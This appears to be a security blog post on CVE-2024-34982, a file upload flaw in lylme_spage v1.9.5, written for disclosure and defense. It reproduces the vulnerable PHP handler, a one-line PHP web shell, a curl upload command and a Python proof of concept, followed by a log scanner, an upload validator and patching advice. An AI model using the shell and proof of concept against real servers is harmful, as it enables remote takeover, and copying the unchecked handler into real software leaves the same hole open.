It’s 2024, and file upload vulnerabilities are still haunting web applications. CVE-2024-34982, an arbitrary file upload flaw in lylme_spage v1.9.5, is a fresh reminder. The bug lets an attacker upload any file they want, including a PHP web shell, through the /include/file.php component. If you’re running this version, your server can be taken over with a single crafted HTTP request.
This post will dive into what the bug is, how it’s exploited, the actual code snippets, and what you should do to protect your website.
What is lylme_spage?
lylme_spage is a popular open-source navigation page project from China, used for creating personal start pages. It’s light, simple, and widely deployed. Unfortunately, version 1.9.5 comes with a dangerous file upload flaw.
Vulnerability Overview
CVE-2024-34982 lives in the file include/file.php. The script accepts file uploads but does not validate the file type at all. An attacker can upload a file containing PHP code (for example, shell.php), and it lands in a web-accessible directory under its original name.
Once uploaded, the attacker only has to request the file in a browser: the web server hands it to the PHP interpreter and the attacker’s code runs on the server. This is the classic path from an upload bug to remote code execution.
Let’s see how this happens by looking at a simplified version of the vulnerable upload logic in file.php:
<?php
// file.php (vulnerable snippet)
if (isset($_FILES['file'])) {
$upload_dir = "../uploads/";
$filename = $_FILES['file']['name'];
$destination = $upload_dir . $filename;
// No real file type check!
if (move_uploaded_file($_FILES['file']['tmp_name'], $destination)) {
echo "Uploaded!";
} else {
echo "Failed!";
}
}
?>
The handler never checks the file extension (nothing denies .php, .phtml or similar), the MIME type, or the file contents, and it stores the file under the name the client supplied. The snippet writes to ../uploads/ relative to include/, i.e. /uploads/ under the web root, so:
- Anyone can upload a .php file and execute it by navigating to http://target.com/uploads/shell.php (the exact directory depends on where your install is mounted, but the upload location is predictable from the source).
The attacker crafts a web shell, for example a one-line PHP file:
<?php system($_GET['cmd']); ?>
and uploads it with curl:
curl -F "file=@shell.php" http://target.com/include/file.php
Then they reach the shell by browsing to:
http://target.com/uploads/shell.php?cmd=whoami
This runs whoami on the server, as the web server’s user, and returns the output in the response body. Swap the cmd value for anything else and you have an interactive foothold.
Here’s a quick Python PoC that does both steps:
import requests
url = "http://target.com/include/file.php"  # change to the actual target
# Same one-line shell as above; the MIME type is cosmetic, the handler ignores it
files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
r = requests.post(url, files=files)
print('[*] Upload response:', r.text)
# The handler keeps the client-supplied name, so the shell URL is predictable
shell_url = "http://target.com/uploads/shell.php"
payload = {'cmd': 'id'}
r = requests.get(shell_url, params=payload)
print('[*] Shell output:', r.text)
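If you suspect a server was hit, the exploit chain above leaves a clear two-step trace in the web server access log: a POST to the upload endpoint, then a request for a script under the uploads directory. The following scanner is an added example written for this post, not code from lylme_spage or from the original PoC. It parses Apache/nginx "combined"-style lines, and the paths, the sample log lines and the IP addresses (RFC 5737 documentation ranges) are all constructed for the demonstration; adjust UPLOAD_ENDPOINT and UPLOAD_DIR to your deployment.

```python
import re

# Paths from the walkthrough above; change them to match the deployment.
UPLOAD_ENDPOINT = "/include/file.php"
UPLOAD_DIR = "/uploads/"

# Apache/nginx "combined" log format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Anything under the uploads dir whose final extension is script-like, with or
# without a query string. Case-insensitive so "SHELL.PhP" is caught too.
SCRIPT_RE = re.compile(
    re.escape(UPLOAD_DIR) + r"[^?]*\.(?:php\d?|phtml|phar|phps)(?:$|\?)", re.I
)

# Constructed sample log for the demo and tests (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [17/May/2024:14:20:01 +0000] "POST /include/file.php HTTP/1.1" 200 9
203.0.113.7 - - [17/May/2024:14:20:03 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 12
198.51.100.4 - - [17/May/2024:14:21:10 +0000] "GET /uploads/logo.png HTTP/1.1" 200 4321
198.51.100.4 - - [17/May/2024:14:21:12 +0000] "GET /index.php HTTP/1.1" 200 8765
192.0.2.9 - - [17/May/2024:14:22:00 +0000] "GET /uploads/x.phtml HTTP/1.1" 404 153
"""


def analyze(lines):
    """Return one finding dict per suspicious request, in log order.

    kind is "upload_post" for a POST to the upload endpoint and
    "script_in_uploads" for any request of a script-like file under the
    uploads directory (404s included: they are probes worth seeing).
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line; skip rather than guess
        ip, method, target = m["ip"], m["method"], m["target"]
        status = int(m["status"])
        path = target.split("?", 1)[0]
        if method == "POST" and path == UPLOAD_ENDPOINT:
            findings.append({"ip": ip, "ts": m["ts"], "kind": "upload_post",
                             "target": target, "status": status})
        elif SCRIPT_RE.match(target):
            findings.append({"ip": ip, "ts": m["ts"], "kind": "script_in_uploads",
                             "target": target, "status": status})
    return findings


def suspect_ips(findings):
    """IPs that posted to the upload endpoint and later got a 200 for a script
    under the uploads dir: the full chain, not just a probe or a failed upload."""
    first_upload = {}
    suspects = set()
    for i, f in enumerate(findings):
        if f["kind"] == "upload_post":
            first_upload.setdefault(f["ip"], i)
        elif f["status"] == 200 and f["ip"] in first_upload:
            suspects.add(f["ip"])
    return suspects


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['kind']:18} {f['status']} {f['target']}")
    print("suspect IPs:", sorted(suspect_ips(found)))
```

On the sample log the scanner reports the upload and the shell hit from 203.0.113.7, the .phtml probe from 192.0.2.9 (a 404, so not a confirmed compromise), and nothing for the ordinary image and index requests. A hit from suspect_ips means you should treat the host as compromised: pull the uploads directory, the PHP session files and the shell history of the web server user before cleaning up.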
References and Further Reading
- CVE-2024-34982 at NVD
- lylme_spage GitHub Repository
Update Immediately!
- If you’re running lylme_spage v1.9.5 (the version named in the CVE; assume earlier releases share the same upload code), upgrade to the latest release from the project’s GitHub repository.
- If you cannot upgrade right away, configure the web server so that nothing under the uploads directory is passed to the PHP interpreter, and check that directory for files that are not the images the application expects.
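For the code-level fix, the upload handler needs the checks the vulnerable snippet skips: an allowlist of extensions, a content check that agrees with the extension, rejection of embedded PHP, and a server-chosen filename so the client never controls the path. The function below is an added example written for this post in Python so it can be run and tested on its own; it is not lylme_spage code, and the allowed types, the size limit and the sample inputs are assumptions for the demonstration. The PHP fix should implement the same rules.

```python
import re
import secrets

# Assumed policy for this example: only the image types a start page needs,
# each tied to magic-byte prefixes so the extension and content must agree.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit

# A file that passes the magic-byte check can still carry a PHP open tag
# (a polyglot), which matters if the upload dir is ever executed as PHP.
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")

# Stem plus final extension. The stem may contain dots, so "shell.php.jpg"
# is judged on "jpg" here and then fails the content checks below.
NAME_RE = re.compile(r"[^.]+(?:\.[^.]+)*\.([A-Za-z0-9]+)")

# Constructed sample inputs for the demo and tests.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_SHELL = b"<?php system($_GET['cmd']); ?>"


class UploadRejected(ValueError):
    pass


def validate_upload(client_name: str, data: bytes) -> str:
    """Return a random server-side filename for data, or raise UploadRejected.

    The client-supplied name is only used to read the extension; it is never
    written to disk, so traversal or crafted names cannot pick the target path.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    if not client_name.isprintable() or any(c in client_name for c in "/\\"):
        raise UploadRejected("path separator or control character in filename")
    m = NAME_RE.fullmatch(client_name)
    if m is None:
        raise UploadRejected("filename needs a stem and an extension")
    ext = m.group(1).lower()  # ".PhP" and ".phtml" both fail the allowlist
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared type")
    if any(marker in data for marker in PHP_MARKERS):
        raise UploadRejected("PHP code embedded in upload")
    # Random name: the URL is not predictable, and the extension is the
    # validated one rather than whatever the client sent.
    return f"{secrets.token_hex(16)}.{ext}"


def check_upload(client_name: str, data: bytes) -> tuple:
    """Non-raising wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, validate_upload(client_name, data)
    except UploadRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    for name, data in [
        ("shell.php", SAMPLE_SHELL),
        ("shell.phtml", SAMPLE_SHELL),
        ("shell.php.jpg", SAMPLE_SHELL),
        ("shell.jpg", b"\xff\xd8\xff" + SAMPLE_SHELL),
        ("../../include/shell.png", SAMPLE_PNG),
        ("shell.php\x00.jpg", SAMPLE_PNG),
        (".htaccess", b"AddType application/x-httpd-php .jpg"),
        ("logo.png", SAMPLE_PNG),
    ]:
        print(f"{name!r:28} -> {check_upload(name, data)}")
```

Store the returned name in a directory the web server serves as static content only, and keep the mapping from the random name to the original name in the database if the UI needs to display it. Note that the .htaccess case is rejected by the stem rule, not by a special case: an attacker who can drop an .htaccess into the uploads directory on Apache can re-enable PHP execution there, which is why the allowlist, not a denylist of known-bad extensions, is the right shape.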
Conclusion
An arbitrary file upload bug like CVE-2024-34982 can be catastrophic: it is easy to exploit, needs no special skill, and hands the attacker code execution as the web server user. If you use lylme_spage, patch as soon as you can, and in any upload handler you write, allowlist extensions, verify the content matches, and never store a file under the name the client chose.
Don’t wait until your server is compromised. Secure it today.
Timeline
Published on: 05/17/2024 14:15:11 UTC
Last modified on: 08/01/2024 13:52:29 UTC